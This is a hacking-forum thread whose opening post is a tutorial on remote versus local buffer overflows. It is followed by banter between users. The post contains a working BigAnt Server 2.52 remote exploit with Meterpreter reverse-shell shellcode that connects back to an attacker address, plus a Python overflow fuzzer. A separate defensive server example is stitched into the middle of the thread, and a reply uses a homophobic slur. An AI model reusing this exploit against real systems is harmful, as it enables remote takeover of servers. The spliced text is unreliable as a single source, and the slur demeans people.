Difference between Local overflow and Remote
  • chroniccommand
    Posts: 1,389
    [-----------------------------------------]
    Paper: Difference between Local overflow and Remote
    Written for: iExploit
    By: Chroniccommand
    [-----------------------------------------]

    First, before I begin this paper, I should explain something about sockets. I will be using sockets in Python for this paper. What this will be showing is the difference between a Local Buffer Overflow and a Remote Buffer Overflow. In a remote overflow, we are sending all the data using sockets over the internet to the remote target. In a local overflow, we have the code on our local drive, and we can play around with the program directly in GDB, where we can disassemble the program and check the registers, etc.
    So a socket is going to connect us to the target, where we can send the data through a connection. Take a look at this diagram: (I made it in Paint. Don't judge :P)
    http://img139.imageshack.us/img139/47/flow1.png
    In this diagram "A" is the attacker, and "B" is the remote target. The red line shows the connection we make using sockets. That blue box is the packet that holds the overflow code we will be using. It's going to contain our overflow code, shellcode, etc., and travel to "B".
    http://img685.imageshack.us/img685/9482/flow2.png
    In this diagram, the code is sent right through to the target machine.
    http://img168.imageshack.us/img168/7214/flow3.png
    Now, all the code has been delivered to the target machine, "B", and if it is performed right the shellcode is executed. If we used shellcode that executes "/bin/sh", we get the SH shell (Unix machines).
    Take a look at this code in Python, used to connect to a target machine.

    #!/usr/bin/python
    import sys, socket
    host = sys.argv[1]            # target host taken from the command line
    buffer = "\x41" * 300         # 300 bytes of 'A' (0x41) to overrun the remote buffer
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, 6660))       # connect to the service on port 6660
    s.send(buffer + "\r\n\r\n")   # send the data followed by the request terminator
    s.close()

    Now we import sys and socket in this code. Host is equal to sys.argv[1], which will make it a command line argument.
    Buffer is equal to \x41 times 300, which is used to overflow the remote system.
    Now we send the buffer with a socket in Python, and connect to it. Once it is sent the socket is closed.
    These are the basics for writing remote overflow code in Python. Of course, there is much more that needs to be done.

    Now the difference is, in a local overflow we can play around with it much more. In a remote overflow, we send all of our data to be used in a socket. This will then perform all your commands. You can think of it as a piece of string. You put a droplet of water on one end. The droplet of water contains all of your shellcode, NOPs, etc. And the droplet of water travels down the string to the end, "B", and our code is then delivered to our program. Boom, remote shell.
    Take a look at this remote overflow code written in Python (not by me):

    #!/usr/bin/python

    #BigAnt Server 2.52 remote buffer overflow exploit 2
    #Author: DouBle_Zer0
    #Vulnerability discovered by Lincoln
    #a another version of the original exploit (by Lincoln)
    #application is little hazy..

    import sys,socket

    host = sys.argv[1]
    buffer= "\x90" * 20

    #./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.3 R | ./msfencode -e x86/alpha_mixed -t c
    #size 643 byte
    buffer+= ("\x89\xe1\xd9\xce\xd9\x71\xf4\x59\x49\x49\x49\x49\x49\x49\x49"
    "\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41"
    "\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
    "\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x49"
    "\x6c\x49\x78\x4c\x49\x47\x70\x43\x30\x47\x70\x45\x30\x4f\x79"
    "\x4a\x45\x50\x31\x49\x42\x45\x34\x4e\x6b\x42\x72\x50\x30\x4e"
    "\x6b\x50\x52\x44\x4c\x4c\x4b\x51\x42\x47\x64\x4e\x6b\x51\x62"
    "\x44\x68\x46\x6f\x4d\x67\x50\x4a\x51\x36\x45\x61\x4b\x4f\x44"
    "\x71\x49\x50\x4c\x6c\x45\x6c\x50\x61\x43\x4c\x44\x42\x46\x4c"
    "\x51\x30\x4a\x61\x4a\x6f\x44\x4d\x46\x61\x4a\x67\x4b\x52\x4a"
    "\x50\x42\x72\x50\x57\x4c\x4b\x42\x72\x44\x50\x4e\x6b\x42\x62"
    "\x45\x6c\x47\x71\x48\x50\x4c\x4b\x51\x50\x42\x58\x4b\x35\x49"
    "\x50\x50\x74\x50\x4a\x47\x71\x48\x50\x50\x50\x4c\x4b\x43\x78"
    "\x46\x78\x4e\x6b\x51\x48\x47\x50\x43\x31\x49\x43\x49\x73\x47"
    "\x4c\x51\x59\x4c\x4b\x45\x64\x4c\x4b\x43\x31\x4b\x66\x44\x71"
    "\x49\x6f\x50\x31\x4f\x30\x4e\x4c\x49\x51\x48\x4f\x46\x6d\x43"
    "\x31\x4a\x67\x44\x78\x49\x70\x51\x65\x4a\x54\x45\x53\x51\x6d"
    "\x4a\x58\x45\x6b\x43\x4d\x51\x34\x43\x45\x48\x62\x43\x68\x4e"
    "\x6b\x46\x38\x51\x34\x43\x31\x4b\x63\x45\x36\x4e\x6b\x44\x4c"
    "\x50\x4b\x4c\x4b\x43\x68\x47\x6c\x46\x61\x4e\x33\x4c\x4b\x44"
    "\x44\x4c\x4b\x47\x71\x4a\x70\x4c\x49\x43\x74\x51\x34\x51\x34"
    "\x43\x6b\x51\x4b\x50\x61\x42\x79\x51\x4a\x46\x31\x4b\x4f\x49"
    "\x70\x46\x38\x43\x6f\x51\x4a\x4e\x6b\x42\x32\x48\x6b\x4d\x56"
    "\x43\x6d\x50\x68\x46\x53\x46\x52\x45\x50\x43\x30\x43\x58\x43"
    "\x47\x50\x73\x50\x32\x43\x6f\x42\x74\x45\x38\x50\x4c\x43\x47"
    "\x46\x46\x47\x77\x49\x6f\x4b\x65\x4c\x78\x4e\x70\x45\x51\x47"
    "\x70\x47\x70\x45\x79\x48\x44\x43\x64\x42\x70\x42\x48\x44\x69"
    "\x4b\x30\x42\x4b\x47\x70\x4b\x4f\x48\x55\x50\x50\x46\x30\x46"
    "\x30\x46\x30\x43\x70\x50\x50\x47\x30\x46\x30\x43\x58\x4a\x4a"
    "\x44\x4f\x49\x4f\x49\x70\x4b\x4f\x4b\x65\x4a\x37\x50\x6a\x44"
    "\x45\x43\x58\x4f\x30\x4e\x48\x47\x71\x44\x43\x45\x38\x45\x52"
    "\x43\x30\x44\x51\x43\x6c\x4e\x69\x49\x76\x50\x6a\x42\x30\x50"
    "\x56\x46\x37\x50\x68\x4a\x39\x4d\x75\x44\x34\x50\x61\x4b\x4f"
    "\x4b\x65\x4f\x75\x4b\x70\x42\x54\x44\x4c\x4b\x4f\x42\x6e\x47"
    "\x78\x44\x35\x4a\x4c\x43\x58\x4a\x50\x48\x35\x4d\x72\x43\x66"
    "\x4b\x4f\x4a\x75\x50\x6a\x47\x70\x43\x5a\x45\x54\x46\x36\x43"
    "\x67\x42\x48\x44\x42\x49\x49\x4f\x38\x51\x4f\x4b\x4f\x4b\x65"
    "\x4e\x6b\x47\x46\x50\x6a\x51\x50\x42\x48\x45\x50\x42\x30\x43"
    "\x30\x45\x50\x50\x56\x42\x4a\x45\x50\x42\x48\x51\x48\x4c\x64"
    "\x46\x33\x4a\x45\x49\x6f\x4e\x35\x4a\x33\x43\x63\x42\x4a\x45"
    "\x50\x46\x36\x43\x63\x50\x57\x50\x68\x44\x42\x48\x59\x4f\x38"
    "\x43\x6f\x4b\x4f\x4e\x35\x43\x31\x48\x43\x51\x39\x4f\x36\x4c"
    "\x45\x49\x66\x43\x45\x48\x6c\x4b\x73\x44\x4a\x41\x41")
    buffer+= "\x90" * 294
    buffer+= "\xe9\x4c\xfc\xff\xff" #near jmp -----> shellcode
    buffer+= "\xeb\xf9\x90\x90" #short jmp ----> near jmp
    buffer+= "\x95\x32\x9a\x0f" #p/p/r(partial overwrite is not possible as far as i know)
    buffer+= "\x41" * 1000 #play
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host,6660))
    s.send("USV " + buffer + "\r\n\r\n")
    s.close()

    If you see, this is all of our overflow information, just packed into variables and sent over the socket.

    --Chroniccommand
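The exchange the paper describes, seen from the receiving end, as an added example that is not part of the original post or of any iExploit code: a small Python 3 server that reads one request of the shape used above (a command word, the data, then `\r\n\r\n`), enforces a hard length bound before it parses anything, and flags long runs of a single byte, which is what the 300-byte `\x41` padding and the `\x90` NOP sled in the paper look like on the wire. Both ends run in one process over `socket.socketpair()`, so it works offline. The limits `MAX_LINE` and `SLED_RUN`, the `USV` command word (borrowed from the exploit quoted in the post) and the sample requests are assumptions constructed for the demo.

```python
import socket
import threading

# Assumed protocol limits for the demo (hypothetical, not from the paper):
# a legitimate request body never exceeds MAX_LINE bytes, and SLED_RUN
# identical bytes in a row is treated as padding or a NOP sled.
MAX_LINE = 256
SLED_RUN = 64
TERMINATOR = b"\r\n\r\n"   # the request terminator used by the paper's client code


def classify_request(body: bytes) -> str:
    """Return 'too_long', 'sled' or 'ok' for one received request body."""
    if len(body) > MAX_LINE:
        return "too_long"
    run = 1
    for prev, cur in zip(body, body[1:]):
        run = run + 1 if cur == prev else 1
        if run >= SLED_RUN:
            return "sled"
    return "ok"


def serve_one(conn: socket.socket) -> str:
    """Server side: read one request with an upper bound, classify it,
    answer, and close.  The bound is checked before every read, so the
    server never holds more than MAX_LINE + len(TERMINATOR) + 64 bytes
    however much the peer sends; the data is never copied into a
    fixed-size buffer, which is the defect a remote overflow relies on."""
    buf = b""
    while len(buf) <= MAX_LINE + len(TERMINATOR) and not buf.endswith(TERMINATOR):
        chunk = conn.recv(64)
        if not chunk:          # peer closed before sending a terminator
            break
        buf += chunk
    body = buf[:-len(TERMINATOR)] if buf.endswith(TERMINATOR) else buf
    verdict = classify_request(body)
    conn.sendall(b"OK\r\n" if verdict == "ok" else b"REJECT " + verdict.encode() + b"\r\n")
    conn.close()
    return verdict


def exchange(payload: bytes) -> tuple:
    """Run both ends in one process over a socketpair: the client sends
    payload + terminator exactly as the paper's client does, the server
    reads and answers.  Returns (server verdict, reply seen by the client)."""
    client, server = socket.socketpair()
    result = {}
    worker = threading.Thread(target=lambda: result.update(verdict=serve_one(server)))
    worker.start()
    client.sendall(payload + TERMINATOR)
    reply = client.recv(64)
    client.close()
    worker.join()
    return result["verdict"], reply


if __name__ == "__main__":
    # Constructed sample requests: a normal command, the paper's 300-byte
    # "\x41" padding, and a "\x90" NOP sled short enough to pass the length check.
    for sample in (b"USV hello", b"USV " + b"\x41" * 300, b"USV " + b"\x90" * 100):
        verdict, reply = exchange(sample)
        print(f"{len(sample):4d} bytes -> {verdict:9s} reply={reply!r}")
```

The length check runs before the request is interpreted at all, which is the order that matters: a server that parses first and checks afterwards has already done the unsafe copy. The run-length check is only a signal for logging or an IDS rule, since a legitimate client can send repeated bytes, so it is reported separately from the hard bound.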
  • Xin
    Posts: 3,251
    Nice paper dude :), btw you know when I said *please wait while I google answer* I know the difference, that was meant to be a joke as what Plastic was thinking
    Xin
  • chroniccommand
    Posts: 1,389
    Lol yea I know. Plastic == Disaster
    Fag mod from F3
    I bet he doesn't understand this at all. Let him go back to his skiddy VB coding crypters :P
  • Xin
    Posts: 3,251
    Haha, that's probably true, he won't understand. I got warned for it on F3
    Xin
  • chroniccommand
    Posts: 1,389
    Lol. You know what that means? He's a 10 year old who can't handle something like rejection or the fact he can't code or hack for his life. I saw a thread on F3 and I asked him why he uses winblows. His answer:
    "because it looks good"
    lmfao......... I lol'ed.
    Bet he couldn't install Arch or even Ubuntu if he tried. Probably rm -rf / his drive hahah.
  • Xin
    Posts: 3,251
    Haha, yeah, so are you banned on F3?
    Xin
  • chroniccommand
    Posts: 1,389
    Until tonight at 9 PM
    Gonna be funny when I get back on xD
  • Xin
    Posts: 3,251
    Haha I can't wait :P
    Xin
  • chroniccommand
    Posts: 1,389
    Me too lol. Idk if I'm going to put this post on there. I kinda wanna see people like
    "DOOD this r not haxoring. RAT's and VB is hax0ring. 1ll l33t fux0r you with mah VB skillzzz dood"
    xD
  • Xin
    Posts: 3,251
    Copy and paste what you and he say and put it in the discussion section for a laff :P
    Xin
  • chroniccommand
    Posts: 1,389
    Oh I will. I'll expect stuff like
    "Hey i put this in my VB and it said errors were happening everywhere"
    and
    "dood this arent VB this isnt coding. VB is teh only codez eva!"
    and
    "WTF!?!?"
    xD
  • Xin
    Posts: 3,251
    Haa, he will be like "YOU'RE the skid as you can't code in VB",
    you're like
    "maybe because I don't want to code in VB, I could do it in my sleep"
    Xin
  • chroniccommand
    Posts: 1,389
    Lol I need to code it for school. All I do is code pyPG though. 1200+ lines of Python code =D
  • Bursihido
    Posts: 406
    Thanks for the very nice info :)
  • chroniccommand
    Posts: 1,389
    Thanks, I figured people should know this. Watch out for my next paper:
    "All about the stack"
    :D

    I had to explain to Disaster all about the stack and the PUSH / POP technique lol. Hey, he may have learned something.